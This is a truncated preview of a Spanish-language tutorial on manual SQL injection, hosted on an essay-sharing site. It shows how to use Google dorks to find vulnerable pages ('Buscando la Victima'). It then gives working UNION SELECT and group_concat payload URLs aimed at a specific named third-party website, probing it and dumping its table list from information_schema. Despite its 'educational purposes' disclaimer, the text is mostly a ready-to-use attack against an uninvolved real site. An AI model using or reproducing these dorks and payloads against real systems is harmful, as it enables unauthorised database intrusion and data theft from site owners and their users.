Sqli

Solo disponible en BuenasTareas
  • Páginas : 5 (1250 palabras )
  • Descarga(s) : 0
  • Publicado : 2 de septiembre de 2012
Leer documento completo
Vista previa del texto
SQL INYECCION MANUAL
Break Security Hackers_
Introducción:  

Este tutorial tiene fines educativos, no me hago responsable de los actos cometidos.

 Esta técnica es muy común y ,personalmente, es una de las mas sencillas de hacer y encontrar, de la cual consta en ir filtrando códigos logrando que nos devuelva una entrada deseada "por nosotros" la base de datos.

Materiales:

 . UnNavegador WEB (Firefox)
  . Un Buscador (En nuestro caso www.google.com)
   . Ingenio para construir una dork
   . Mucha pero mucha paciencia 

Dorks:

 Son combinaciones de palabras claves ,que se usa en el buscador, en la cual nos ayudara a encontrar sitios que contengan esa estructura.

Construyendo Nuestras Dorks para SQLi:

 Hay que tener en cuenta que vamos a trabajar con la URL.  Nuestras dorks tendrán un aspecto como el siguiente:

          inurl:producto.php?id=

 De la cual inurl: me esta diciendo que lo que quiero encontrar que lo busque en la dirección url,producto es una palabra que se me ocurrió, acá es donde ustedes deben ser creativos y experimentar con la palabra que se les ocurra, .php? me dice el formato, id= nos busca con resultados, que va a serla relación con la base de datos, del cual podemos jugar tambien en esta parte con otras palabras como pag= o cat= , etc..

Otras 

inurl:mercaderia.php?id=
inurl:producto.php?pag=
inurl:comercio.php?cat=

Yo usare la siguiente Dork:

Buscando la Victima:

 Eso nos muestra como nos busco una url que contenga lo que pediamos.

Seleccionando una web:

 Bueno, acá es donde entra gran parte lapaciencia en juego, ya que no todas las web van a ser vulnerables a este metodo.

 Yo seleccione esta web:

http://biocanvalencia.com/producto.php?id=107

  Como vera contiene las palabras de nuestra dork. 

 Bueno, ¿Qué hacemos ahora?, tenemos que averiguar si es o no vulnerable a este tipo de ataque. ¿Como lo hacemos? introduciendo caracteres especiales ( ',-) después del numero,¿Qué números?los que están despues del = 

http://biocanvalencia.com/producto.php?id=107'

En el caso que no sea vulnerable, la web seguir normal o nos redireccionara a otra pagina. Y en el caso que sea vulnerable nos mostrara un error como el siguiente:

Nuestra web es vulnerable a SQLi : 

Comenzando con el ataque: 

Continuamos haciendo llamadas a la Base de Datos desde la URL, solo que ahoradelante del numero agregaremos - y despues del numero agregaremos +union+select+1-- . Este ultimo numero lo vamos a ir alternando hasta conseguir que el error que nos muestra desaparesca. Ejemplo:

http://biocanvalencia.com/producto.php?id=-107+union+select+1,2--

Desaparece el error despues de ir adicionando numeros, y nos mostrara unos numeros http://biocanvalencia.com/producto.php?id=-107+union+select+1,2,3,4,5,6,7,8,9,10,11--

 Acá nos a tirado  2 y 4. De la cual usare el primero, que es el 2  para averiguar sus tablas

Sacando las Tablas:

Bueno, para sacar las tablas tenemos 2 formas "que hasta ahora conosco", las podemos sacar todas de un solo tiro o ir sacando una por una. En ambos caso remplazaremos con códigos uno de los números que nos arrojo, dentro de la URL Sacando todas las tablas de un solo tiro:

Bueno esta es una de las partes mas divertidas de SQLi, para sacar las tablas 

 ¿Como lo haremos?

 Pues como anteriormente mencione, remplazaremos el 2 de la url, con el siguiente codigo:

replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29

y al final de la url le agregaremos lo siguiente:

+from+information_schema.tableshttp://biocanvalencia.com/producto.php?id=-107+union+select+1,replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 ,3,4,5,6,7,8,9,10,11+from+information_schema.tables--

Sacando tablas una por una:

Para sacar las tablas una por una lo que haremos sera lo siguiente, remplazaremos el numero que elegido "2" por el siguiente codigo:

table_name

y al final de la url pondremos como en la...
tracking img